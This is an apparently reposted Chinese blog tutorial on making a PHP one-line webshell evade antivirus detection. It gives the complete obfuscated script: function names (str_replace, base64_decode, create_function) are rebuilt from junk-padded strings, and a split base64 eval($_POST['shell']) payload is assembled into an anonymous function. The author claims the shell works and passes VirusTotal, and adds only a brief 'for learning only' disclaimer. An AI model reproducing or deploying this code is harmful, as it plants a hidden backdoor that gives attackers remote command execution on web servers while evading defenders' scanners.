生活随笔
收集整理的這篇文章主要介紹了
PHP一句话木马免杀(通过VirusTotal测试)
小編覺得挺不錯的,現(xiàn)在分享給大家,幫大家做個參考.
PHP一句話木馬免殺
僅用于學習與交流,請勿用于非法用途!!!
簡介與思路
流程
<?php
eval($_POST['shell']);
?>
<?php
eval($_POST['shell']);
$huan = str_replace("ac","","sactacrac_raceacpaclacaacce");
// 思路是先在str_replace中寫好要構(gòu)造的函數(shù),
// 這里是打算把$huan這個變量當成str_replace函數(shù)來用
// 就先把第一三個參數(shù)填好,第一個隨便填,第三個先填成要轉(zhuǎn)換的目標
// 得$huan = str_replace("ac","","str_replace")
// 接著把第一個參數(shù)里面的東西隨便插入進去
// 得$huan = str_replace("ac","","sactacrac_raceacpaclacaacce")
$jiemi = str_replace("bd","","bbdabdsbdebd64_dbdebdcbdobdde");
// 這里是打算把$jiemi這個變量當成base64_decode函數(shù)來用
$hanshu = str_replace("ef","","cefrefeefaeftefe_fefuefnefceftefiefoefn");
// 這里是打算把$hanshu這個變量當成create_function函數(shù)來用
?>
$a="ZXZhbCgkX1BPU1RbJ3NoZWxsJ10pOw==";
// 把基本語句進行base64加密
// 把基本語句進行base64加密,隨便插入點字符
$s1="ZXZhbqwerCgkX1";
$s2="BPUqwer1RbJ3";
$s3="NoqwerZWxsJ";
$s4="10qwerpOw==";
$ans = $hanshu('',$jiemi($huan("qwer","",$s1.$s2.$s3.$s4)));
// 利用之前準備好的函數(shù)和字符串把需要的語句拼出來,拼成一個匿名函數(shù)
$ans();
// 調(diào)用這個函數(shù)
<?php
$huan = str_replace("ac","","sactacrac_raceacpaclacaacce");//密碼是shell
// 思路是先在str_replace中寫好要構(gòu)造的函數(shù),
// 這里是打算把$huan這個變量當成str_replace函數(shù)來用
// 就先把第一三個參數(shù)填好,第一個隨便填,第三個先填成要轉(zhuǎn)換的目標
// 得$huan = str_replace("ac","","str_replace")
// 接著把第一個參數(shù)里面的東西隨便插入進去
// 得$huan = str_replace("ac","","sactacrac_raceacpaclacaacce")
$jiemi = $huan("bd","","bbdabdsbdebd64_dbdebdcbdobdde");
// 這里是打算把$jiemi這個變量當成base64_decode函數(shù)來用
$hanshu = $huan("ef","","cefrefeefaeftefe_fefuefnefceftefiefoefn");
// 這里是打算把$hanshu這個變量當成create_function函數(shù)來用
$s1="ZXZhbqwerCgkX1";
$s2="BPUqwer1RbJ3";
$s3="NoqwerZWxsJ";
$s4="10qwerpOw==";
// 將加密后的語句拆分開
$ans = $hanshu('',$jiemi($huan("qwer","",$s1.$s2.$s3.$s4)));
// 利用之前準備好的函數(shù)和字符串把需要的語句拼出來,拼成一個匿名函數(shù)
$ans();
// 調(diào)用這個函數(shù)
?>
可用性測試
?
可以發(fā)現(xiàn)這個馬是可以用的
云沙箱測試
VirusTotal
結(jié)果非常理想
總結(jié)
以上是生活随笔為你收集整理的PHP一句话木马免杀(通过VirusTotal测试)的全部內(nèi)容,希望文章能夠幫你解決所遇到的問題。
如果覺得生活随笔網(wǎng)站內(nèi)容還不錯,歡迎將生活随笔推薦給好友。
